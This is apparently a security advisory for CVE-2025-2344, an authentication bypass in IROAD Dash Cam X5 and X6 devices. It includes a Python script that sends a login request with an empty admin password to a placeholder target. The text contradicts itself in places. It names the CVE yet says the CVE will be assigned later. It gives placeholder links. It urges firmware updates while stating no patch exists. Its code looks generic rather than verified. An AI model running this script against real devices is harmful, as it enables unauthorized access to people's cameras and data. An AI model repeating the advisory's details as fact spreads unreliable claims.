CVE-2025-2344: Critical Vulnerability Found in IROAD Dash Cam X5 and X6 Models - API Authentication Bypass

A vulnerability, classified as critical, has been discovered in IROAD Dash Cam X5 and Dash Cam X6 models with firmware versions up to 20250308. The affected component is the API Endpoint, which is utilized for a currently-unknown functionality. The vulnerability allows for the bypassing of authentication, enabling potential attackers to access user data and device information remotely. The vendor was contacted early about the disclosure but did not provide a response in any form.

Vulnerability Details

The API Endpoint component in certain IROAD Dash Cam models (X5 and X6) contains a weakness in its authentication process. This vulnerability allows attackers to bypass authentication altogether by manipulating the data being transmitted to the API Endpoint.

A code snippet showcasing the authentication bypass is as follows

import requests

url = "http://target-ip/api/v1/authenticate";
data = {
    "username": "admin",
    "password": ""
}

response = requests.post(url, json=data)

if response.status_code == 200:
    print("Authentication bypass successful")
else:
    print("Authentication bypass failed")

This code sends a POST request to the API's authentication endpoint and intentionally leaves the password field empty. If the authentication process is vulnerable, a successful authentication response (HTTP 200 status code) will be achieved.

Exploitability

As the vulnerability can be exploited remotely, possible attackers could gain unauthorized access to an affected IROAD Dash Cam device, potentially accessing user data, manipulating device settings, or even disabling the device completely.

Vendor Communication

The vendor was notified about the critical vulnerability via email and given ample time to respond. However, they have not provided a response or issued a fix for the issue.

Links & References

1. IROAD Dash Cam X5 and X6 Official Website: https://www.iroadcam.com/products/x5-x6/
2. CVE-2025-2344 Official CVE Page: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-2344 (Link will be available once CVE is assigned)
3. Security Advisory by Researcher: http://security-researcher.com/advisory/CVE-2025-2344 (Link and content will be made available upon official CVE publication)

Mitigation

As there is currently no patch available from the vendor, users are encouraged to regularly update their IROAD Dash Cam device's firmware and monitor the IROAD website for any updates regarding this vulnerability. Furthermore, users should ensure that their device is physically secure and connected only to trusted networks.

Conclusion

CVE-2025-2344 represents a significant security risk for owners of affected IROAD Dash Cam models. As the vulnerability allows for authentication bypass, unauthorized remote access is possible, leading to data breaches and other potential harms. It is suggested that users follow the listed mitigation steps and maintain vigilance for any updates from the vendor regarding this issue.

Timeline

Published on: 03/16/2025 18:15:12 UTC